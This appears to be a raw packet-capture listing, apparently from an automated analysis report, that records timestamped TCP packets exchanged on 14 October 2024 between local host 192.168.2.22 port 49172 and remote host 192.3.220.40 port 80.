                                                                                                                                                                              Oct 14, 2024 11:06:10.528990030 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529001951 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529010057 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529015064 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529035091 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529119015 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529130936 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529140949 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529150963 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529156923 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529164076 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529165030 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529177904 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529190063 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529201031 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529201031 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529212952 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529233932 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529253006 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529752970 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529764891 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529777050 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529788971 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529798985 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529824972 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.529918909 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529941082 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529952049 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.529972076 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530046940 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530059099 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530069113 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530078888 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530081034 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530097961 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530112028 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530123949 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530133963 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530144930 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530145884 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530158043 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530165911 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530189991 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530278921 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530289888 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530301094 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530312061 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530322075 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530323029 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530333996 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530345917 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530348063 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530356884 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530368090 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530369043 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530380011 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.530383110 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530419111 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.530994892 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531006098 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531018019 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531030893 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531044006 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531069040 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531124115 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531136990 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531155109 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531164885 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531166077 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531181097 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531202078 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531232119 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531243086 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531255007 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531265974 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531269073 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531277895 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531290054 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531311035 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531441927 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531454086 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531464100 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531474113 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531486034 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531490088 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531498909 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531502962 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531512022 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531522989 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531533003 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531536102 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531543970 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531544924 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531558037 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531568050 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.531578064 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.531606913 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532058001 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532069921 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532082081 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532094002 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532102108 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532134056 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532277107 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532288074 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532299995 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532320023 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532341003 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532352924 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532362938 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532375097 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532377958 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532387018 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532418013 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532428980 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532438993 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532453060 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532471895 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532547951 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532561064 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532571077 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532582045 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532591105 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532593012 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532603025 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532603979 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532623053 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532634974 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532638073 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532648087 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532660007 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532670975 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532671928 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532685995 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.532695055 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.532723904 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533253908 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533266068 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533277035 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533287048 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533298969 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533320904 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533410072 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533422947 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533433914 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533457041 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533474922 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533487082 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533497095 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533508062 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533514023 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533524036 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533546925 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533557892 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533567905 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533577919 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533584118 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533590078 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533605099 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533617973 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533660889 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533741951 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533754110 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533765078 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533775091 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533786058 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533788919 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533797979 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533799887 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533811092 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533823013 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533828974 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533835888 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533848047 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.533858061 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.533885956 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534365892 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534410954 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534421921 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534430981 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534449100 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534507036 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534523010 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534630060 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534641027 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534651041 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534662008 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534666061 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534673929 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534677029 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534689903 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534707069 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534708023 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534718990 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534730911 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534740925 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534743071 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534751892 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534763098 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534765005 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534775019 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534789085 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534811020 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534897089 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534908056 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534919024 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534929991 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534934044 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534940958 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534951925 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534961939 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534969091 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.534975052 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.534989119 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535017014 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535505056 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535572052 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535582066 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535599947 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535607100 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535636902 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535681963 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535693884 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535705090 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535727024 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535761118 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535773039 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535783052 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535794973 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535800934 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535809040 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535836935 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535847902 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535859108 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535868883 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535873890 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535883904 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.535964012 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535975933 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535985947 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.535998106 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536003113 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536015987 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536031961 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536036968 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536048889 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536061049 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536071062 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536072969 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536082029 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536096096 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536096096 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536134958 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536664009 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536684990 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536695957 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536720037 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536741018 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536787987 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536827087 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536838055 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536849976 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536874056 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536906958 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536919117 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536931038 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536941051 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536945105 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536952972 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536967993 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536983967 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.536990881 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.536994934 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537007093 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537018061 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537029028 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537031889 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.537041903 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537049055 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.537076950 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.537137985 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537148952 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537159920 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537169933 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537179947 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.537183046 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537204027 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.537205935 CEST4917280192.168.2.22192.3.220.40
